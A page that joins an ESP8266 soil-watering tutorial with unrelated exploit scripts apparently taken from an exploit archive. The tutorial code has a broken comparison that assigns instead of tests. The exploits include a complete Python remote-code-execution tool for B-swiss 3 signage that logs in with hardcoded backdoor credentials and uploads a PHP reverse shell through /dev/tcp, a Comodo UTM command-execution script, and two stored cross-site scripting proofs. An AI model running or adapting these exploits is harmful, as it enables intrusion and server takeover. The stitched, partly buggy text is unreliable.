Check the current temperature, humidity and soil humidity through the mobile phone. When the soil humidity is less than 50%, automatically start the relay and water it with a water pump. Disconnect the relay if the humidity exceeds 50%.
Required Equipment
esp8266 relay DHT11 soil moisture sensor
Line connection
Equipment VCC (+) GND (-) Signal Line Relay 3VGNDD4DHT113VGNDD2 Soil Sensor 3VGNDD0
Code
#define BLINKER_WIFI
#define BLINKER_MIOT_SENSOR //Introduce Xiaoai classmate
#define soilPin A0 //Soil sensor pin DO
#define CS 2 //Define the relay pin to D4
#include Blinker.h
#include DHT.h //DHT11 sensor header file
#define DHTPIN 4 //Define DHT11 module connection pin io4 (D2 pin)
#define DHTTYPE DHT11 //Use the DHT11 temperature and humidity module, of course you can also replace other DHTs
//Storage the soil value
int soilValue;
//Define soil moisture
int soilMoisture;
char auth[]='1c2ce3eef946'; //The key key of the lamp app
char ssid[]='PDCN'; //WiFi name to connect to
char pswd[]='1234567890'; //WiFi password
BlinkerNumber HUMI('humi'); //Define the humidity data key name
BlinkerNumber TEMP('temp'); //Define the temperature data key name
BlinkerNumber TEMP2('temp2'); //Define the soil moisture data key name
DHT dht(DHTPIN, DHTTYPE); //Define dht
float humi_read=0, temp_read=0; //Initialize the read data
//Dashboard components
void heartbeat()
{
HUMI.print(humi_read); //Relay humidity data back to blinkerapp
TEMP.print(temp_read); //Relay the temperature data to blinkerapp
TEMP2.print(soilMoisture);
if(soilMoisture=50) //Soil humidity is less than 50
{
digitalWrite(CS,digitalRead(CS)); //Run the relay
}
else
{
digitalWrite(CS, HIGH);
}
}
//Real-time curve chart component
void dataStorage()
{
Blinker.dataStorage('temp', temp_read);
Blinker.dataStorage('humi', humi_read);
Blinker.dataStorage('humi2', soilMoisture);
}
//The data is returned to Xiao Ai classmate
void miotQuery(int32_t queryCode)
{
BLINKER_LOG('MIOT Query codes: ', queryCode);
int humi_read_int=humi_read; //Convert float to int type, integer
BlinkerMIOT.humi(humi_read_int); //Xiaoai receives humidity
BlinkerMIOT.temp(temp_read); //Xiaoai receives temperature
BlinkerMIOT.print();
}
void setup()
{
//Initialize the serial port Serial, enable debug output
Serial.begin(9600);//Bad rate
BLINKER_DEBUG.stream(Serial);
BLINKER_DEBUG.debugAll();
Blinker.begin(auth, ssid, pswd);//WIFI initialization settings
Blinker.attachHeartbeat(heartbeat);//Register dashboard
dht.begin();
BlinkerMIOT.attachQuery(miotQuery);//Register Xiaoai
Blinker.attachDataStorage(dataStorage);//Register real-time curve
pinMode(LED_BUILTIN, OUTPUT);
digitalWrite(LED_BUILTIN, 1);
pinMode(CS, OUTPUT);//Initialize the relay pin
digitalWrite(CS, HIGH); //Initialize the relay pin
}
void loop()
{
Blinker.run();//Responsible for processing the data received by blinker. Each time it runs, it will parse the data received by the device once. (This is very important)
float h=dht.readHumidity();//Read the humidity data collected by DHT11
float t=dht.readTemperature();//Read the temperature data collected by DHT11
if (isnan(h) || isnan(t))//Judge whether the temperature and humidity value is empty
{
BLINKER_LOG('Reading sensor data failed');
}
else
{
BLINKER_LOG('Humidity: ', h, ' %');//Print out debug information
BLINKER_LOG('Temperature: ', t, ' *C');
humi_read=h;
temp_read=t;
}
soilValue=analogRead(soilPin); //Get the soil value 0-1024
soilMoisture=map(soilValue,0,1023,100,0);//Convert 0-1024 to 100%-0 The soil moisture in the air is 1024
Blinker.delay(200);
//Delay function, maintains connection between devices and data reception processing during the delay process
}
Effect
When the humidity is less than 50%, the relay automatically works.
When the soil moisture is higher than 50%, the relay stops working 
Of course, the above code only completes the corresponding functions. There may be certain shortcomings. You can modify it yourself according to your actual situation.
# Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution
# Date: 2020-08-27
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.b-swiss.com
# Version: <= 3.6.5
# CVE : N/A
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# B-swiss 3 Digital Signage System 3.6.5 Backdoor Remote Code Execution
#
#
# Vendor: B-Swiss SARL | b-tween Sarl
# Product web page: https://www.b-swiss.com
# Affected version: 3.6.5
# 3.6.2
# 3.6.1
# 3.6.0
# 3.5.80
# 3.5.40
# 3.5.20
# 3.5.00
# 3.2.00
# 3.1.00
#
# Summary: Intelligent digital signage made easy. To go beyond the
# possibilities offered, b-swiss allows you to create the communication
# solution for your specific needs and your graphic charter. You benefit
# from our experience and know-how in the realization of your digital
# signage project.
#
# Desc: The application suffers from an "authenticated" arbitrary
# PHP code execution. The vulnerability is caused due to the improper
# verification of uploaded files in 'index.php' script thru the 'rec_poza'
# POST parameter. This can be exploited to execute arbitrary PHP code
# by uploading a malicious PHP script file that will be stored in
# '/usr/users' directory. Due to an undocumented and hidden "maintenance"
# account 'admin_m' which has the highest privileges in the application,
# an attacker can use these hard-coded credentials to authenticate and
# use the vulnerable image upload functionality to execute code on the
# server.
#
# ========================================================================================
# lqwrm@metalgear:~/prive$ python3 sign2.py 192.168.10.11 192.168.10.22 7777
# [*] Checking target...
# [*] Good to go!
# [*] Checking for previous attempts...
# [*] All good.
# [*] Getting backdoor session...
# [*] Got master backdoor cookie: 0c1617103c6f50107d09cb94b3eafeb2
# [*] Starting callback listener child thread
# [*] Starting handler on port 7777
# [*] Adding GUI credentials: test:123456
# [*] Executing and deleting stager file
# [*] Connection from 192.168.10.11:40080
# [*] You got shell!
# id ; uname -or
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# 4.15.0-20-generic GNU/Linux
# exit
# *** Connection closed by remote host ***
# [?] Want me to remove the GUI credentials? y
# [*] Removing...
# [*] t00t!
# lqwrm@metalgear:~/prive$
# ========================================================================================
#
# Tested on: Linux 5.3.0-46-generic x86_64
# Linux 4.15.0-20-generic x86_64
# Linux 4.9.78-xxxx-std-ipv6-64
# Linux 4.7.0-040700-generic x86_64
# Linux 4.2.0-27-generic x86_64
# Linux 3.19.0-47-generic x86_64
# Linux 2.6.32-5-amd64 x86_64
# Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64
# macOS 10.13.5
# Microsoft Windows 7 Business Edition SP1 i586
# Apache/2.4.29 (Ubuntu)
# Apache/2.4.18 (Ubuntu)
# Apache/2.4.7 (Ubuntu)
# Apache/2.2.22 (Win64)
# Apache/2.4.18 (Ubuntu)
# Apache/2.2.16 (Debian)
# PHP/7.2.24-0ubuntu0.18.04.6
# PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1
# PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1
# PHP/5.6.31
# PHP/5.6.30-10+deb.sury.org~xenial+2
# PHP/5.5.9-1ubuntu4.17
# PHP/5.5.9-1ubuntu4.14
# PHP/5.3.10
# PHP/5.3.13
# PHP/5.3.3-7+squeeze16
# PHP/5.3.3-7+squeeze17
# MySQL/5.5.49
# MySQL/5.5.47
# MySQL/5.5.40
# MySQL/5.5.30
# MySQL/5.1.66
# MySQL/5.1.49
# MySQL/5.0.77
# MySQL/5.0.12-dev
# MySQL/5.0.11-dev
# MySQL/5.0.8-dev
# phpMyAdmin/3.5.7
# phpMyAdmin/3.4.10.1deb1
# phpMyAdmin/3.4.7
# phpMyAdmin/3.3.7deb7
# WampServer 3.2.0
# Acore Framework 2.0
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2020-5590
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5590.php
#
#
# 13.06.2020
#
from http.cookiejar import DefaultCookiePolicy# #yciloPeikooCtluafeD tropmi rajeikooc.ptth mofr
from http.cookiejar import CookieJar# oOo #raJeikooC tropmi rajeikooc.ptth mofr
from six.moves import input# #-----------------+-----------------# #tupni trompi sevom.xis morf
from time import sleep# | 01 | 04 | #peels trompi emit morf
import urllib.request# | | | | #tseuqer.billru tropmi
import urllib.parse# | | | | #esrap.billru tropmi
import telnetlib# | | | #biltenlet tropmi
import threading# | | | | #gnidaerht tropmi
import requests# | | | | #stseuqer tropmi
import socket# | | o | #tekcos tropmi
import sys,re# | | | #er,sys tropmi
############## #-----------------+-----------------# ##############
############### oOo ###############
################ | ################
#################### Y ####################
############################ _ ############################
###############################################################################################
class Sign:
def __init__(self):
self.username = b"\x61\x64\x6d\x69\x6e\x5f\x6d"
self.altruser = b"\x62\x2d\x73\x77\x69\x73\x73"
self.password = b"\x44\x50\x36\x25\x57\x33\x64"
self.agent = "SignageBot/1.02"
self.fileid = "251"
self.payload = None
self.answer = False
self.params = None
self.rhost = None
self.lhost = None
self.lport = None
self.send = None
def env(self):
if len(sys.argv) != 4:
self.usage()
else:
self.rhost = sys.argv[1]
self.lhost = sys.argv[2]
self.lport = int(sys.argv[3])
if not "http" in self.rhost:
self.rhost = "http://{}".format(self.rhost)
def usage(self):
self.roger()
print("Usage: python3 {} <RHOST[:RPORT]> <LHOST> <LPORT>".format(sys.argv[0]))
print("Example: python3 {} 192.168.10.11:80 192.168.10.22 7777\n".format(sys.argv[0]))
exit(0)
def roger(self):
waddup = """
____________________
/ \\
! B-swiss 3 !
! RCE !
\____________________/
! !
! !
L_ !
/ _)!
/ /__L
____________/ (____)
(____)
____________ (____)
\_(____)
! !
! !
\__/
"""
print(waddup)
def test(self):
print("[*] Checking target...")
try:
r = requests.get(self.rhost)
response = r.text
if not "B-swiss" in response:
print("[!] Not a b-swiss system")
exit(0)
if "B-swiss" in response:
print("[*] Good to go!")
next
else:
exit(-251)
except Exception as e:
print("[!] Ney ney: {msg}".format(msg=e))
exit(-1)
def login(self):
token = ""
cj = CookieJar()
self.params = {"locator" : "visitor.ProcessLogin",
"username" : self.username,
"password" : self.password,
"x" : "0",
"y" : "0"}
damato = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
damato.addheaders.pop()
damato.addheaders.append(("User-Agent", self.agent))
try:
print("[*] Getting backdoor session...")
damato.open(self.rhost + "/index.php", urllib.parse.urlencode(self.params).encode('utf-8'))
for cookie in cj:
token = cookie.value
print("[*] Got master backdoor cookie: "+token)
except urllib.request.URLError as e:
print("[!] Connection error: {}".format(e.reason))
return token
def upload(self):
j = "\r\n"
self.cookies = {"PNU_RAD_LIB" : self.rtoken}
self.headers = {"Cache-Control" : "max-age=0",
"Content-Type" : "multipart/form-data; boundary=----j",
"User-Agent" : self.agent,
"Accept-Encoding" : "gzip, deflate",
"Accept-Language" : "en-US,en;q=0.9",
"Connection" : "close"}
self.payload = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/"+self.lhost+"/"+str(self.lport)+" <&1;rm "+self.fileid+".php'\");"
print("[*] Adding GUI credentials: test:123456")
# rec_adminlevel values:
# ----------------------
# 100000 - "b-swiss Maintenance Admin" (Undocumented privilege)
# 7 - "B-swiss admin" <---------------------------------------------------------------------------------------+
# 8 - Other |
# |
self.send = "------j{}Content-Disposition: form-data; ".format(j)# |
self.send += "name=\"locator\"{}Users.Save{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"page\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"sort\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"id\"{}{}{}------j\r\nContent-Disposition: form-data; ".format(j*2,self.fileid,j,j)# |
self.send += "name=\"ischildgrid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"inpopup\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"ongridpage\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"rowid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"preview_screenid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# |
self.send += "name=\"rec_firstname\"{}TestF{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_lastname\"{}TestL{}------j{}Content-Disposition: form-data; ".format(j*2,j,2)# |
self.send += "name=\"rec_email\"{}test@test.cc{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_username\"{}test{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_password\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_cpassword\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# |
self.send += "name=\"rec_adminlevel\"{}7{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# <----------+
self.send += "name=\"rec_status\"{}1{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
self.send += "name=\"rec_poza\"; filename=\"Blank.jpg.php\"{}Content-Type: application/octet-stream{}".format(j,j*2)
self.send += self.payload+"{}------j{}Content-Disposition: form-data; ".format(j,j)
self.send += "name=\"rec_poza_face\"{}C:\\fakepath\\Blank.jpg{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
self.send += "name=\"rec_language\"{}french-sw{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
self.send += "name=\"rec_languages[]\"{}2{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
self.send += "name=\"rec_can_change_password\"{}1{}------j--{}".format(j*2,j,j)
requests.post(self.rhost+"/index.php", headers=self.headers, cookies=self.cookies, data=self.send)
print("[*] Executing and deleting stager file")
r = requests.get(self.rhost+"/usr/users/"+self.fileid+".php")
sleep(1)
self.answer = input("[?] Want me to remove the GUI credentials? ").strip()
if self.answer[0] == "y" or self.answer[0] == "Y":
print("[*] Removing...")
requests.get(self.rhost+"/index.php?locator=Users.Delete&id="+self.fileid, headers=self.headers, cookies=self.cookies)
if self.answer[0] == "n" or self.answer[0] == "N":
print("[*] Cool!")
print("[*] t00t!")
exit(-1)
def razmisluju(self):
print("[*] Starting callback listener child thread")
konac = threading.Thread(name="ZSL", target=self.phone)
konac.start()
sleep(1)
self.upload()
def fish(self):
r = requests.get(self.rhost+"/usr/users/", verify=False, allow_redirects=False)
response = r.text
print("[*] Checking for previous attempts...")
if not ".php" in response:
print("[*] All good.")
elif "251.php" in response:
print("[!] Stager file \"{}.php\" still present on the server".format(self.fileid))
def phone(self):
telnetus = telnetlib.Telnet()
print("[*] Starting handler on port {}".format(self.lport))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", self.lport))
while True:
try:
s.settimeout(7)
s.listen(1)
conn, addr = s.accept()
print("[*] Connection from {}:{}".format(addr[0], addr[1]))
telnetus.sock = conn
except socket.timeout as p:
print("[!] No outgoing calls :( ({msg})".format(msg=p))
print("[+] Check your port mappings or increase timeout")
s.close()
exit(0)
break
print("[*] You got shell!")
telnetus.interact()
conn.close()
def main(self):
self.env()
self.test()
self.fish()
self.rtoken = self.login()
self.razmisluju()
if __name__ == '__main__':
Sign().main()
# Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
# Date: 2018-08-15
# Exploit Author: Milad Fadavvi
# Author's LinkedIn: https://www.linkedin.com/in/fadavvi/
# Vendor Homepage: https://www.comodo.com/
# Version: Releases before 2.7.0 & 1.5.0
# Tested on: Windows=Firefox/chrome - Kali=firefox
# PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC
# CVE : CVE-2018-17431
# CVE-detailes: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
# CVSS 3 score: 9.8
import requests
def RndInt(Lenght):
from random import choice
from string import digits
RandonInt = ''.join([choice(digits) for n in range(Lenght)])
return str(RandonInt)
if __name__ == "__main__":
IP = input("IP: ")
Port = input("Port: ")
Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a' ## Disable SSH
'''For more info about command try to read manual of spesefic version of Comodo UTM and
exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC)
'''
BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) +"&h=" + RndInt(2)
BaseNComdURL = BaseURL + "&k=" + Command
LastPart = "&l=" + RndInt(2) +"&_=" + RndInt(13)
FullURL = BaseNComdURL + LastPart
AddetionalEnter = BaseURL + "&k=%0a" + LastPart
try:
FirstResponse = requests.get(FullURL).text
except:
print('\nExploit failed due HTTP Error. Check given URL and Port!\n')
exit(1)
SecondResponse = requests.get(AddetionalEnter).text
if SecondResponse.find("Configuration has been altered") == -1:
print("\nExploit Failed!\n")
exit(1)
else:
print("\nOK! Command Ran!\n")
exit(0)
# Exploit Title: Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting
# Date: 2020-09-19
# Exploit Author: Alperen Ergel
# Vendor Homepage: https://www.flatpress.org/
# Software Link: https://github.com/evacchi/flatpress/releases/tag/v1.0.3
# Version: 1.0.3
# Tested on: windows 10 / xampp
# CVE : CVE-2020-35241
# Proof Of Content
POST /flatpress/admin.php?p=entry&action=write HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Origin: http://localhost/
Connection: close
Referer: http://localhost/flatpress/admin.php?p=entry&action=write
Cookie: fpuser_fp-a53f4609=opensourcecms; fppass_fp-a53f4609=79dc9a3c529fcd0d9dc4fc7ff22187b6; fpsess_fp-a53f4609=71v18tu3lsc0s021q2pj8a3je7; _ga=GA1.2.487908813.1600520069; _gid=GA1.2.951134816.1600520069; _gat=1
Upgrade-Insecure-Requests: 1
_wpnonce=4fc4222db1&_wp_http_referer=%2Fflatpress%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=XSS×tamp=1600526382&
entry=entry200919-143942&attachselect=--&imageselect=--&content=<img src=x onerror='alert("TEST XSS")'/>&savecontinue=Save%26Continue
# Snipp
content=[PAYLOAD] //<img src=x onerror='alert("TEST XSS")'/>
# Title: Visitor Management System in PHP 1.0 - Persistent Cross-Site Scripting
# Exploit Author: Rahul Ramkumar
# Date: 2020-09-16
# Vendor Homepage: https://projectworlds.in
# Software Link: https://projectworlds.in/wp-content/uploads/2020/07/Visitor-Management-System-in-PHP.zip
# Version: 1.0
# Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1
# CVE: N/A
# Description: The file myform.php does not perform input validation on the request paramters. An attacker can inject javascript payloads in the parameters to perform various attacks suchs as stealing of cookies,sensitive information etc.
import requests, sys, urllib, re
from lxml import etree
from io import StringIO
from colorama import Fore, Back, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
import random
import string
def print_usage(STRING):
return Style.BRIGHT+Fore.YELLOW+STRING+Fore.RESET
if __name__ == "__main__":
if len(sys.argv) != 2:
print print_usage("Usage:\t\t python %s <WEBAPP_URL>" % sys.argv[0])
print print_usage("Example:\t python %s 'https://192.168.1.72:443/visitor_management/'" % sys.argv[0])
sys.exit(-1)
SERVER_URL = sys.argv[1]
XSS_DIR = '/myform.php'
XSS_URL = SERVER_URL + XSS_DIR
XSS_PoC_URL = SERVER_URL + '/front.php'
s = requests.Session()
s.get(SERVER_URL, verify=False)
payload = {'name': 'd3crypt','cno':'9876543210','purpose':'stored xss','MeetingTo':'Hack','comment':'<script>alert("xss")</script>','submit_post':'Submit','mydata':''}
r1 = s.post(url=XSS_URL, data=payload, verify=False)
r2 = s.get(XSS_PoC_URL, allow_redirects=False, verify=False)
response_page = r2.content.decode("utf-8")
parser = etree.HTMLParser()
tree = etree.parse(StringIO(response_page), parser=parser)
def get_links(tree):
refs = tree.xpath("//a")
links = [link.get('data-content', '') for link in refs]
return [l for l in links]
visitors = get_links(tree)
#print(visitors)
for visitor in visitors:
if 'stored xss' in visitor:
rid=visitor.split(':')[6].strip()
print print_usage('Make the logged-in user click this URL: ' + XSS_PoC_URL + '?rid=' + rid)